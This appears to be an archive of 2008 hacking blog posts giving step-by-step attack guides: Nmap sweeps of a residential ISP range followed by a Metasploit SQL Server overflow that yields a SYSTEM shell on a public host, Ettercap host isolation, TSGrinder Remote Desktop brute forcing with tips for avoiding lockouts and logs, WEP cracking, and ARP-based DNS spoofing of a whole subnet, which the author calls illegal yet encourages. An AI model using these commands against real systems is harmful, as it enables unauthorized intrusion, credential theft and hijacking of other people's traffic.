Monday, July 28, 2008

MSSQL Exploit

The following exploit is for Microsoft SQL Server.

Requirements
Metasploit framework
NMap

Microsoft SQL Server listens on port 1433 and port 1434. Port 1433 is a TCP (Transmission Control Protocol) port. While 1434 is a UDP (User Defined Protocol) port. For NMap we will be using a SYN Scan a SYN scan is pretty much like playing ding dong ditch. A regular protocol requires a three way hand shake. A SYN scan initiates the hand shake waits for a reply then leaves. Metasploit we will be using the exploit MSSQL 2000/MSDE Resolution Overflow. “This is an exploit for the SQL Server 2000 resolution service buffer overflow. This overflow is triggered by sending a udp packet to port 1434 which starts with 0x04 and is followed by long string terminating with a colon and a number. This module should work against any vulnerable SQL Server 2000 or MSDE install (pre-SP3).”

First step is to find a vulnerable host to do this we will be looking for a host that has port 1434 open. When I scan hosts with NMap I always give it a range for I have a better chance of getting a hit. I also have the command output the results to a file for I have them on record and they are easier to search.

#nmap –sU –p1434 –P0 –sS 24.151.0.0/16 >>/home/user/1434.txt

-sU UDP scan
-p What port to scan in this case 1434
-P0 Don’t ping host first
-sS SYN scan this is for TCP but I’m in the habit of always using it
IP The IP address 24.151.0.0
/ Subnet suffix in this case 16=255.255.0.0
>> Where the output file is going to be located

The scan is going to take a while we are scanning 65,025 hosts. When the scan is done or 30min feel free to start searching the output file for anything that says open.

Interesting ports on 24-151-73-076.dhcp.nwtn.ct.charter.com (24.151.73.76):
PORT STATE SERVICE
1434/udp open ms-sql-s

So now that we found a potential box for attack we try to hack it. I will be using Metasploit 2 console for this attack, Metasploit 3, gui and web interface will all work as well.

#msfconsole
[*] Starting the Metasploit Framework...



+ -- --=[ msfconsole v2.7 [158 exploits - 76 payloads]

msf >use mssql2000_resolution
msf mssql2000_resolution >set PAYLOAD win32_reverse_meterpreter
PAYLOAD -> win32_bind_meterpreter
msf mssql2000_resolution(win32_bind_meterpreter) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ ------- ------------------
required RHOST The target address
required RPORT 1434 The target port

Payload: Name Default Description
-------- -------- ------------------------------------------- ----------------------
--------------------
required EXITFUNC process Exit technique: "proce
ss", "thread", "seh"
required METDLL /home/framework/data/meterpreter/metsrv.dll The full path the mete
rpreter server dll
required LPORT 4444 Listening port for bin
d shell

Target: MSQL 2000 / MSDE

msf mssql2000_resolution(win32_bind_meterpreter) >


msf mssql2000_resolution(win32_bind_meterpreter) > set RHOST 24.151.73.76
RHOST -> 24.151.73.76




msf mssql2000_resolution(win32_bind_meterpreter) > set LHOST 10.10.10.197
LHOST -> 10.10.10.197
msf mssql2000_resolution(win32_bind_meterpreter) > exploit
[*] Starting Bind Handler.
[*] Trying target MSQL 2000 / MSDE with return address 0x42b48774
[*] Execute 'net start sqlserveragent' once access is obtained
[*] Got connection from 10.10.10.197:2199 <-> 24.89.130.146:4444
[*] Sending Intermediate Stager (89 bytes)
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed

meterpreter> use –m Process
loadlib: Loading library from ‘ext227496.dll’ on the remote machine
meterpreter>
loadlib: success.
meterpreter> execute –f cmd –c
execute: Executing ‘cmd’…
meterpreter>
execute: success, process id is 1576
execute: allocated channel 1 for new process.
meterpreter> interact 1
interact: Switching to interactive console on 1…
meterpreter>
interact: Starter interactive channel 1.

Microsfor Windows 2000 {Version 5.00.2195
© Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>

When you get to the shell you can do a whoami and you will see that you are logged in as NT AUTHORITY\SYSTEM, that means you have Administrator rights. Now your imagination is the limit.







By,
Syrus

Thursday, July 24, 2008

Isolate IP

Ettercap has a plug in to isolate network IP address. In a sense it causes a DOS attack. This can be useful for network administrators. For example unlike cisco where you can shutdown an interface on a switch, sonicwall wont let you do such a thing; which can make administering a good amount harder. Especially when you have end users running itunes and torrents etc.
To start this attack you will need the IP of the host you are isolating. In this case it will be 192.168.2.3. How this attack works every packet the computer sends out will resolver its own mac address. Here is the network setup of a windows box using ipconifg /all.

Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : NVIDIA nForce Networking Controller
Physical Address. . . . . . . . . : 00-11-D8-70-48-4F
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 192.168.2.3
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.2.1
DHCP Server . . . . . . . . . . . : 192.168.2.1
DNS Servers . . . . . . . . . . . : 192.168.2.1
Primary WINS Server . . . . . . . : 192.168.2.1
Lease Obtained. . . . . . . . . . : Thursday, July 24, 2008 11:42:50 AM
Lease Expires . . . . . . . . . . : Thursday, July 24, 2008 11:52:50 AM

Here is the arp -a out put
Interface: 192.168.2.3--- 0x2
Internet Address Physical Address Type
192.168.2.1 00-06-b1-36-1f-24 dynamic

To start the attack we are going to be using the isolate plugin. And specify the IP that we are attacking. Here is what the command looks like.

#ettercap -i sk0 -P isolate /192.168.2.3/ //

The command will take about 5 min to go into effect since that is how long it takes the arp cache to refresh, once it does this is what the ap should look like.

Interface: 192.168.2.3--- 0x2
Internet Address Physical Address Type
192.168.2.1 00-11-D8-70-48-4F dynamic

As you notice that is'nt the same mac address that 192.168.2.1 had when we first ran the arp -a, it is now resolving the mac address of itself. If you try to resolve a web site the ettercap will output something along the lines of this.

TCP 192.168.2.3:80 --> 127.0.0.1:80 | AP

Tuesday, July 22, 2008

tsgrinder

TSGrinder is a terminal server Brute Force tool. It uses dictionary attacks and has a very useful leet function. Given the leet file and dict file are weak to start with but that is easily remedied. If you run the command you will get the following.
c:\tsgrinder>tsgrinder.exe
tsgrinder version 2.03

Usage:
tsgrinder.exe [options] server

Options:
-w dictionary file (default 'dict')
-l 'leet' translation file
-d domain name
-u username (default 'administrator'
-b banner flag
-n number of simultaneous threads
-D debug level (default 9, lower number is more output)

Example:
tsgrinder.exe -w words -l leet -d workgroup -u administrator -b -n 2 10.1.1.1

The example demonstrates very well how to use this program. So for this example I will be attacking my server.

C:\tsgrinder>tsgrinder.exe -w dict -u administrator 192.168.2.1
password aaa - failed
password abc - failed
password academia - failed
password academic - failed
password access - failed
password ada - failed
password admin - failed
password adrian - failed
password adrianna - failed
password aerobics - failed
password airplane - failed
password password - success!

Once tsgrinder finds the password, it will output success and log off of mstsc. Since the dict file is weak, I recommend googling for a world list file. This will make life a lot easier. The leet file is also pretty weak by default. This is all it has:
l 1
e 3
t 7
s 5
Feel free to edit this by adding some more such as:
a @
o 0
etc.. I also recommend using the administrator account for these attacks, since by default it won't get locked out with so many password attempts. Also, if you noticed, tsgrinder will try 5 passwords, and then disconnects, and then reconnects, and trys 5 more. This is because a log entry won't appear until you get the password wrong on 6 consecutive attempts. This app won't throw a windows log file either. Now for the 1337. You just add the "-l" switch to the command.

C:\tsgrinder>tsgrinder.exe -w dict -l leet -u administrator 192.168.2.3
password academia - failed
password acad3mia - failed
password academic - failed
password acad3mic - failed
password access - failed
password acces5 - failed
password acce5s - failed
password acce55 - failed
password acc3ss - failed
password acc3s5 - failed
password acc35s - failed
password acc355 - failed

That shows you vaguely how it works. There is also the "-n" switch which allows more then 1 session. So with one session you are able to try 5 passwords in 10 seconds, but if you use "-n 2" you will be able to try 10 passwords in 11 seconds. I haven't tried more then 2 simultaneously connections since it does slow your computer down.

C:\tsgrinder>tsgrinder.exe -w dict -u administrator -n 2 192.168.2.3

Monday, July 21, 2008

WEP Cracking

This is a guide I wrote a couple years back as you can tell since secuirty auditor has been backtracks for over a year now. Most information holds true still.
Needed:
2 Prism 2/2.5/3 wireless cards
2 Computers running Security auditor

Key
# means channel number
PC means the AP’s client MAC address
AP means AP’s MAC address

Lets begin

Computer 1

Start up kismet

Press s to sort the AP’s

Press Enter on the AP your attacking get the following info
-Channel
-SSID
-BSSID

Press x to exit

Press shift + c get the following information
-PC

Exit kismet

Open terminal and run the following commands
Switch-to-hostap
Cardctl eject
Cardctl insert
Iwconfig wlan0 channel #
Iwpriv wlan0 hostapd 1
Iwconfig wlan0 mode master
Void11_penetration –D –s PC –B AP wlan0

Computer 2

Open terminal and run the following commands
Switch-to-wlanng
Cardctl eject
Cardctl insert
Monitor.wlan wlan0 #
Cd /ramdisk
Aireplay –I wlan0 –b AP –m 68 –n 68 –d ff:ff:ff:ff:ff:ff

You need a packet that looks like such
FromDS – 0
ToDS -1
BSSID – AP
SourceMAC – PC
Destination MAC – ff:ff:ff:ff:ff:ff

Click y to replay this ARP packet

Computer1

Since you got the above packet you can close void11

Open terminal and run
Switch-tp-wlanng
Cardctl eject
Cardctl insert
Monitor.wlan wlan0 #
Cd /ramdisk
Airodump wlan0 cap1

Once you get 100,000 IV’s exit for 64bit keys 800,000 for 128bit keys

Open terminal
Cd /ramdisk (key length)
Aircrack –f 2 –m AP –n 64/128 –q 3 cap*.cap

In a while you should have you WEP key

Thursday, July 17, 2008

NMAP

Well hopefully you read my previous post on nmap. My friend came over was looking at nmap logs. He asked me why do I always print them to a file instead of browising it in a terminal. It's easier to search a file, for say the word "open". There is a problem I noticed when I print out the results to a file. It dosn't always print out the os option even if I got it from doing it in the terminal. Well anyway to print the output to a file you just add the following to the end of the command.

>>file location

This works on both unix and windows box's the following command is for a windows machine and the one that follows is for a unix box.

C:\Program Files\Nmap> nmap -p80 -P0 -sS 69.182.0.0/16 >>c:\folder\nmap.txt
#nmap -p80 -P0 -sS 69.182.0.0/16 >>/home/user/nmap.txt

Just a refresher of what everything means
-p80 port 80
-P0 run scan even if ping dosn't succeed
-sS Syn scan
IP The ip address of whom you are scanning or starting point in range
/16 Subnet 255.255.0.0
>> Where to ouput the file

Monday, July 14, 2008

Internal IP's on the internet

So when I was routerless for about a month or so when ever I booted up my computer I noticed my computer was requesting for a DHCP address and it was talking to a 10.x.x.x address. So I decided to delv a little deeper to see what was going on. I fired up ettercap to collect DHCP requests and this is what I got.
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.93.130.73] OFFER : 10.12.4.155 255.255.0.0 GW 10.12.0.1 DNS 24.151.8.219
DHCP: [10.12.0.1] ACK : 10.12.4.155 255.255.0.0 GW 10.12.0.1 DNS 24.151.8.219
DHCP: [10.93.130.73] OFFER : 10.12.42.34 255.255.0.0 GW 10.12.0.1
DHCP: [10.12.0.1] ACK : 10.12.42.34 255.255.0.0 GW 10.12.0.1
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.93.130.73] OFFER : 10.12.4.83 255.255.0.0 GW 10.12.0.1 DNS 24.151.8.219
DHCP: [10.12.0.1] ACK : 10.12.4.83 255.255.0.0 GW 10.12.0.1 DNS 24.151.8.219


Interesting huh? Well it gets even better. My IP wasn't even in te 24.*.*.* range.

sk0: flags=8843 metric 0 mtu 1500
options=b
ether 00:17:31:c1:d8:da
inet 96.x.x.x netmask 0xffffff00 broadcast 255.255.255.255
media: Ethernet autoselect (100baseTX )
status: active
So I searched all the IP's on ARIN and they are all owned by Charter, Newtown. So am I getting local IP's because cable broadband is just like a giant lan, I remember hearing that some but never develed to far into it.

Wednesday, July 9, 2008

DNS Spoof

This will only work if the computer running ettercap is set as DMZ or has a direct wan connection. This is ILLEGAL! can't stress that enough, but like the saying goes it's only illegal if you get caught. This will only affect people on the same subnet as you. To show you how many people will be affected by this attack grab you IP address and subnet and convert it to binary. I'm going to use a comcast one for example.
71.235.115.114
255.255.248.0
01000111.11101011.01110011.01110010
11111111.11111111.11111000.00000000
I'm not going to walk you through how to do this bulian math, since you are trying to learn how to hack you should have a basic understanding of networking math. So this is what will be affected.
01000111.11101011.01110000.00000000-01000111.11101011.01110111.11111111
71.235.112.0-71.235.119.255
So that is 1,785 hosts that will be affected as long as you are intiating an attack.
Now on to the attack it self.
As I said earlier we will be running ettercap, I will be using it on FreeBSD.Firstly we need to edit the etter.dns file to input our entry.
#nano /usr/local/share/ettercap/etter.dns
There will be an example already in that will redirect microsft to linux website.

"microsoft.com A 198.182.196.56
*.microsoft.com A 198.182.196.56
www.microsoft.com PTR 198.182.196.56"

To get as many hits on my website as fast as possible I'm going to redirect google.com to my website.

"google.com A 64.148.32.238
*.google.com A 64.148.32.238
www.google.com PTR 64.148.32.238"

Now to run it. We use the following command
#ettercap -T -q -i sk0 -P dns_spoof -M arp // //

Let me break this down for all.
T = text interface
q = quiet
i = interface
p = plug
M = man in the middle
// // = specify all hosts

Thats it when ever anyone goes to google.com the will get redirected to wcosug.org. Notice this will only redirect to dns names that are directly binded to IP address, this will not work with virtual hosts. Since you need to use an IP and not a DNS name in the config file.